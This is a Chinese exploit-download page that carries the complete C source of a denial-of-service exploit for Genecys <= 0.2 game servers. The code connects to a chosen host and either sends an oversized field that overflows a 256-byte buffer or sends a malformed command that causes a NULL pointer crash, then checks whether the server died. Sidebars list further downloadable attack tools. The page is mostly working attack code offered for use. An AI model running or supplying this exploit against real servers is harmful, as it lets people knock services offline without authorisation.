首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全工具>攻击程序>软件详细
软件名称:  genecysbof.zip
文件类型:  
界面语言:  简体中文
软件类型:  国产软件
运行环境:  WinNT/2K/Xp
授权方式:  共享软件
软件大小:  8K
软件等级:  ★★★★☆
发布时间:  2006-05-15
官方网址: http://www.milw0rm.com 作者:Luigi
演示网址:
软件说明:  
Genecys <= 0.2 (BoF/NULL pointer) Denial of Service Exploit
/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif



#define VER         "0.1"
#define PORT        5501
#define BUFFSZ      8192    // max
#define BOFSZ       1400    // too big, dest buffer is 256



void genecys_send(int sd, u_char *buff, u_char *cmd, ...);
int genecys_recv(int sd, u_char *buff, int size);
int mycpy(u_char *dst, u_char *src);
u_int resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            attack,
            i;
    u_short port = PORT;
    u_char  buff[BUFFSZ],
            bof[BOFSZ];

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Genecys <= 0.2 buffer-overflow and NULL pointer crash "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <host> [port(%hu)]\n"
            "\n"
            "Attack:\n"
            " 1 = tell_player_surr_changes buffer-overflow\n"
            " 2 = parse_command NULL pointer crash\n"
            "\n", argv[0], port);
        exit(1);
    }

    attack = atoi(argv[1]);

    if(argc > 3) port = atoi(argv[3]);
    peer.sin_addr.s_addr = resolv(argv[2]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();

    printf("- connect ...");
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    printf(" done\n");

    genecys_recv(sd, buff, sizeof(buff));
    printf("- %s\n", buff);

    if(attack == 2) {
        printf("- parse_command NULL pointer crash\n");
        genecys_send(
            sd,
            buff,
            "adpl",
            "nm",   // no ':'!!!
            NULL);
    } else {
        printf("- tell_player_surr_changes buffer-overflow\n");
        memset(bof, 'a', sizeof(bof) - 1);
        bof[sizeof(bof) - 1] = 0;

        genecys_send(
            sd,
            buff,
            "adpl",
            "nm",   bof,
            "user", "myusername",
            "pass", "mypassword",
            NULL);
    }

    printf("- wait some seconds:\n");
    for(i = 3; i; i--) {
        printf("%d\r", i);
        sleep(ONESEC);
    }

    close(sd);
    sleep(ONESEC);

    printf("- check server:\n");
    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) {
        printf("\n  Server IS vulnerable!!!\n\n");
    } else {
        printf("\n  Server doesn't seem vulnerable\n\n");
    }
    close(sd);
    return(0);
}



void genecys_send(int sd, u_char *buff, u_char *cmd, ...) {
    va_list ap;
    int     cv;
    u_char  *s,
            *p;

    p = buff;
    p += mycpy(p, cmd);

    va_start(ap, cmd);
    for(cv = 0; (s = va_arg(ap, u_char *)); cv++) {
        *p++ = (cv & 1) ? ':' : ' ';    // this method is used ONLY for a simpler attack 2
        p += mycpy(p, s);
    }
    va_end(ap);
    *p++ = '\r';

    if(send(sd, buff, p - buff, 0)
      < 0) std_err();
}



int genecys_recv(int sd, u_char *buff, int size) {
    int     t,
            len;

    for(len = 0, size--; size; size--, len++, buff++) {
        t = recv(sd, buff, 1, 0);
        if(t < 0) std_err();
        if(!t) break;
        if(*buff == '\r') break;
    }

    *buff = 0;
    return(len);
}



int mycpy(u_char *dst, u_char *src) {
    u_char *p;

    for(p = dst; *src; src++, p++) {
        *p = *src;
    }
    *p = 0;
    return(p - dst);
}



u_int resolv(char *host) {
    struct  hostent *hp;
    u_int   host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif
下载地址: 进入下载地址列表
下载说明: ☉推荐使用网际快车下载本站软件,使用 WinRAR v3.10 以上版本解压本站软件。
☉如果这个软件总是不能下载的请点击报告错误,谢谢合作!!
☉下载本站资源,如果服务器暂不能下载请过一段时间重试!
☉如果遇到什么问题,请到本站论坛去咨寻,我们将在那里提供更多 、更好的资源!
☉本站提供的一些商业软件是供学习研究之用,如用于商业用途,请购买正版。
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热门软件
·qwks.cpp(MS03-049)
·ms05039.rar
·fsie.rar
·Serv-U FTP溢出漏洞利用工具
·NBSI2破解版
·MS08-067.rar
·提权大杀器(2010黑帽大会公布的
·Churrasco.zip
·tfn2k.tgz
·ms04-011.rar
·SMBdie
·KiTrap0D.zip
  相关软件
·raydiumx.zip
·empiredos.zip
·outgunx.zip
·WinArpAttacker3.50.rar
·BTvoyager.zip
·openttdx.zip
·skulltagfs.zip
·sophos_chunkheap.chm
·arptools-1.0.0.tar.gz
·sophos_namelen.chm
·f_WinSniff v2.0.rar
·sophos_intifiniti.rar
 
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved